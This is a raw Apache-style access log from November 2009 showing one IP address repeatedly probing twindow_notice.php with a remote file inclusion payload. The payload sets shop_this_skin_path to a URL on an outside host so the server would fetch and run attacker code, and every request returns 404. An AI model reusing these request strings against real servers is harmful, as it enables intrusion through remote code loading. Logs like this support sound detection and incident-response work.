64.251.28.214 - - [13/Nov/2009:01:23:07 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:07 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:07 -0500] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:09 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:09 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:09 -0500] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
64.251.28.214 - - [13/Nov/2009:01:23:11 -0500] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://h1.ripway.com/disgore/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
